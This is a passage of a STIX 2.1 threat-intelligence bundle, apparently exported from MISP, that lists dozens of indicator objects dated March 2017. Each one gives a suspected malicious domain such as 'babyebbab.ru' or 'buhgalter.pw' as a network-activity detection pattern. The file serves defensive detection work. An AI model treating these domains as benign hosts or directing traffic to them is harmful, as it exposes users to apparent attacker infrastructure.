"id": "indicator--58db6cb0-034c-49e7-a3d2-4f24950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvohbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb1-b168-47ce-9dc1-4924950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babvulbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb1-3efc-40f9-8dbd-4de8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwabbab2.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb2-dee8-467c-853d-49fd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwahbab.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb3-34a0-4edf-9d6f-4ee4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwebbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb4-e08c-4bf8-a014-40e8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwebbab2.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb5-97d8-47a8-898d-4a83950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwehbab.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb6-7520-49f7-8f6a-4047950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwibbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb7-4bd8-4adf-873d-4f70950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwihbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb7-2d98-472f-85ec-4ac7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwohbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb8-3e00-4785-9a73-48d4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babwulbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cb9-abac-4791-be60-4494950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyabbab2.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cba-ee18-4bf0-8fd2-4fa1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyahbab.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cbb-6004-481f-952b-4fa6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyebbab.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cbc-4878-47d0-bd95-41a5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyebbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cbd-f2b8-4d71-80d3-4933950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyehbab.in']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cbe-a024-479b-88ad-4e46950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyibbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cbe-e208-4b5c-b701-4b53950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyihbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cbf-efe8-4357-87b7-411d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyohbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc0-41dc-437f-810b-4022950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babyulbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc1-8928-4d9e-ae35-4574950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzabbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc2-813c-44cf-b3e9-41cf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzahbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc3-c054-4930-ad1b-436a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzebbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc3-766c-4634-ad1a-4182950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzebbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc4-1298-4943-86e8-4dd3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzehbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc5-659c-4431-ab95-4cc3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzibbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc6-fb30-4bdd-9bb3-4525950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzihbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc7-bc0c-4075-b248-4291950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzohbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc8-67e0-4698-abf8-4f08950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babzulbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc9-4b2c-42af-a42f-4f8d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bannarbor.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cc9-6324-4856-9685-4a69950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bisquitshore.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6cca-ec9c-4913-a97a-4e86950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'bitrixon.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ccb-3014-4f0a-b74f-4283950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'buhgalter.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ccc-6b20-4c18-969e-42d5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'buhgalter.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6ccd-3074-400d-b077-4ebb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'buhgalters.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
